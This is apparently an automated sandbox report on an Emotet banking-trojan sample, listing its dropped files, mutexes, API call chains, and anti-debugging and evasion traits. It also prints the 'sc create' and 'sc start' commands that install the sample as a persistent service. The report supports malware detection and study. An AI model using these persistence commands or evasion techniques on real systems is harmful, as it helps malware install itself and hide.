Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0045656310_2_00456563
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004365CF10_2_004365CF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0040C62E10_2_0040C62E
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044C6B110_2_0044C6B1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00456BC210_2_00456BC2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00456E3610_2_00456E36
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00450E9110_2_00450E91
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00440EAF10_2_00440EAF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00446EA910_2_00446EA9
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00446FBF10_2_00446FBF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0045714010_2_00457140
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004393B610_2_004393B6
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004354FC10_2_004354FC
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044D6DD10_2_0044D6DD
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044D8CA10_2_0044D8CA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004578CA10_2_004578CA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004499CC10_2_004499CC
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004359CF10_2_004359CF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00459A2110_2_00459A21
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00455AF810_2_00455AF8
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00435DA310_2_00435DA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00443FC310_2_00443FC3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_001F28C110_2_001F28C1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_001F30E810_2_001F30E8
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_001F30E410_2_001F30E4
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_006537A510_2_006537A5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_006537A910_2_006537A9
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00652F8210_2_00652F82
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0045602111_2_00456021
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004361AF11_2_004361AF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0044033D11_2_0044033D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0043243011_2_00432430
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0045656311_2_00456563
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004365CF11_2_004365CF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0040C62E11_2_0040C62E
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0044C6B111_2_0044C6B1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00456BC211_2_00456BC2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00456E3611_2_00456E36
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00450E9111_2_00450E91
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00440EAF11_2_00440EAF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00446EA911_2_00446EA9
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00446FBF11_2_00446FBF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0045714011_2_00457140
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004393B611_2_004393B6
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004354FC11_2_004354FC
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0044D6DD11_2_0044D6DD
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0044D8CA11_2_0044D8CA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004578CA11_2_004578CA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004499CC11_2_004499CC
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004359CF11_2_004359CF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00459A2111_2_00459A21
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00455AF811_2_00455AF8
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00435DA311_2_00435DA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00443FC311_2_00443FC3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_001F28C111_2_001F28C1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_001F30E811_2_001F30E8
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_001F30E411_2_001F30E4
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 0040A0A5 appears 58 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00438CB5 appears 86 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 0043BCF3 appears 46 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00433D44 appears 194 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 0040BFEA appears 40 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 004042E5 appears 32 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00432ACF appears 44 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 0040119F appears 34 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00406F55 appears 120 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00447FF5 appears 38 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00432A66 appears 394 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00406FC8 appears 38 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 00432A99 appears 52 times
Source: C:\Windows\SysWOW64\msradvb.exeCode function: String function: 0040440F appears 40 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 0040A0A5 appears 58 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00438CB5 appears 86 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 0043BCF3 appears 46 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00433D44 appears 194 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 0040BFEA appears 40 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 004042E5 appears 32 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00432ACF appears 44 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 0040119F appears 34 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00406F55 appears 120 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00447FF5 appears 38 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00432A66 appears 394 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00406FC8 appears 38 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 00432A99 appears 52 times
Source: C:\Windows\Temp\setup.exeCode function: String function: 0040440F appears 40 times
PE file contains strange resourcesShow sources
Source: setup.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: service.exe, 00000007.00000002.5985481373.0000000000415000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameWinScraper.exe vs service.exe
Source: service.exe, 00000007.00000002.5986172786.0000000000E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs service.exe
Source: service.exeBinary or memory string: OriginalFilenameWinScraper.exe vs service.exe
Yara signature matchShow sources
Source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@16/3@0/2
Contains functionality to create servicesShow sources
Source: C:\Windows\Temp\setup.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,9_2_0065CF58
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E21943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,8_2_00E21943
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0041B1B5 __EH_prolog3_catch_GS,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,8_2_0041B1B5
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0042C3B2 FindResourceA,8_2_0042C3B2
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371000 StartServiceCtrlDispatcherW,7_2_00371000
Contains functionality to register a service control handler (likely the sample is a service DLL)Show sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371000 StartServiceCtrlDispatcherW,7_2_00371000
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Windows\Temp\setup.exeMutant created: \BaseNamedObjects\Global\I9B7A4626
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\Temp\setup.exeMutant created: \BaseNamedObjects\Global\M9B7A4626
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\service.exeFile created: C:\Windows\TEMP\setup.exeJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: service.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Windows\Temp\setup.exeFile read: C:\$Recycle.Bin\S-1-5-18\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: service.exeVirustotal: Detection: 64%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Windows\SysWOW64\msradvb.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Windows\Temp\setup.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_8-53325
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe' >> C:\servicereg.log 2>&1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c sc start nolbk >> C:\servicestart.log 2>&1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc start nolbk
Source: unknownProcess created: C:\Users\user\Desktop\service.exe C:\Users\user\Desktop\service.exe
Source: unknownProcess created: C:\Windows\Temp\setup.exe C:\Windows\TEMP\\setup.exe
Source: unknownProcess created: C:\Windows\Temp\setup.exe --d2cb1917
Source: unknownProcess created: C:\Windows\SysWOW64\msradvb.exe C:\Windows\SysWOW64\msradvb.exe
Source: unknownProcess created: C:\Windows\SysWOW64\msradvb.exe --21a8e291
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start nolbk Jump to behavior
Source: C:\Users\user\Desktop\service.exeProcess created: C:\Windows\Temp\setup.exe C:\Windows\TEMP\\setup.exeJump to behavior
Source: C:\Windows\Temp\setup.exeProcess created: C:\Windows\Temp\setup.exe --d2cb1917Jump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeProcess created: C:\Windows\SysWOW64\msradvb.exe --21a8e291Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\Temp\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
PE file contains a mix of data directories often seen in goodwareShow sources
Source: service.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: service.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: service.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: service.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: service.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: service.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: service.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: service.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mappingShow sources
Source: service.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: service.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: service.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: service.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: service.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044301E __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,8_2_0044301E
PE file contains sections with non-standard namesShow sources
Source: setup.exe.7.drStatic PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371E76 push ecx; ret 7_2_00371E89
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00432B3E push ecx; ret 8_2_00432B51
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00433D89 push ecx; ret 8_2_00433D9C
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00432B3E push ecx; ret 9_2_00432B51
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00433D89 push ecx; ret 9_2_00433D9C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00432B3E push ecx; ret 10_2_00432B51
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00433D89 push ecx; ret 10_2_00433D9C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00432B3E push ecx; ret 11_2_00432B51
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00433D89 push ecx; ret 11_2_00433D9C

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\SysWOW64\msradvb.exeExecutable created and started: C:\Windows\SysWOW64\msradvb.exeJump to behavior
Source: C:\Windows\Temp\setup.exeExecutable created and started: C:\Windows\TEMP\setup.exeJump to behavior
Drops PE filesShow sources
Source: C:\Users\user\Desktop\service.exeFile created: C:\Windows\Temp\setup.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\Desktop\service.exeFile created: C:\Windows\Temp\setup.exeJump to dropped file

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371000 StartServiceCtrlDispatcherW,7_2_00371000
Uses sc.exe to modify the status of servicesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\Temp\setup.exeFile opened: C:\Windows\SysWOW64\msradvb.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004010AA IsIconic,8_2_004010AA
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,8_2_0040419E
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,8_2_0041E279
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00424704 IsWindowVisible,IsIconic,8_2_00424704
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect,8_2_0040726D
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004010AA IsIconic,9_2_004010AA
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,9_2_0040419E
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,9_2_0041E279
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00424704 IsWindowVisible,IsIconic,9_2_00424704
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect,9_2_0040726D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004010AA IsIconic,10_2_004010AA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,10_2_0040419E
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,10_2_0041E279
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00424704 IsWindowVisible,IsIconic,10_2_00424704
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect,10_2_0040726D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004010AA IsIconic,11_2_004010AA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0040419E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,11_2_0040419E
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0041E279 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,11_2_0041E279
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00424704 IsWindowVisible,IsIconic,11_2_00424704
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0040726D IsIconic,GetWindowPlacement,GetWindowRect,11_2_0040726D
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\service.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\Temp\setup.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-53391
Contains functionality to enumerate running servicesShow sources
Source: C:\Windows\Temp\setup.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,9_2_0065CCBC
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Windows\SysWOW64\msradvb.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Temp\setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_8-53124
Found large amount of non-executed APIsShow sources
Source: C:\Windows\Temp\setup.exeAPI coverage: 2.2 %
Source: C:\Windows\Temp\setup.exeAPI coverage: 3.7 %
Source: C:\Windows\SysWOW64\msradvb.exeAPI coverage: 2.1 %
Source: C:\Windows\SysWOW64\msradvb.exeAPI coverage: 1.8 %
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Checks the free space of harddrivesShow sources
Source: C:\Windows\Temp\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\Temp\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_0037479C FindFirstFileExA,7_2_0037479C
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00426C63 lstrlenA,FindFirstFileA,FindClose,8_2_00426C63
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,8_2_0041F3E5
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00426C63 lstrlenA,FindFirstFileA,FindClose,9_2_00426C63
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_0041F3E5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00426C63 lstrlenA,FindFirstFileA,FindClose,10_2_00426C63
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,10_2_0041F3E5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00426C63 lstrlenA,FindFirstFileA,FindClose,11_2_00426C63
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_0041F3E5
Contains functionality to query system informationShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00432277 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,8_2_00432277
Program exit pointsShow sources
Source: C:\Windows\Temp\setup.exeAPI call chain: ExitProcess graph end nodegraph_8-53385
Source: C:\Windows\Temp\setup.exeAPI call chain: ExitProcess graph end nodegraph_9-53245
Source: C:\Windows\Temp\setup.exeAPI call chain: ExitProcess graph end nodegraph_9-53314
Source: C:\Windows\SysWOW64\msradvb.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\msradvb.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\SysWOW64\msradvb.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371C60 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00371C60
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044301E __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,8_2_0044301E
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_003733C2 mov eax, dword ptr fs:[00000030h]7_2_003733C2
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004010D2 mov eax, dword ptr fs:[00000030h]8_2_004010D2
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E10467 mov eax, dword ptr fs:[00000030h]8_2_00E10467
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E10C0C mov eax, dword ptr fs:[00000030h]8_2_00E10C0C
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E11743 mov eax, dword ptr fs:[00000030h]8_2_00E11743
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E212CD mov eax, dword ptr fs:[00000030h]8_2_00E212CD
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E21E04 mov eax, dword ptr fs:[00000030h]8_2_00E21E04
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004010D2 mov eax, dword ptr fs:[00000030h]9_2_004010D2
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F0467 mov eax, dword ptr fs:[00000030h]9_2_001F0467
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F0C0C mov eax, dword ptr fs:[00000030h]9_2_001F0C0C
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F1743 mov eax, dword ptr fs:[00000030h]9_2_001F1743
Source: C:\Windows\Temp\setup.exeCode function: 9_2_006512CD mov eax, dword ptr fs:[00000030h]9_2_006512CD
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651E04 mov eax, dword ptr fs:[00000030h]9_2_00651E04
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004010D2 mov eax, dword ptr fs:[00000030h]10_2_004010D2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_001F0467 mov eax, dword ptr fs:[00000030h]10_2_001F0467
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_001F0C0C mov eax, dword ptr fs:[00000030h]10_2_001F0C0C
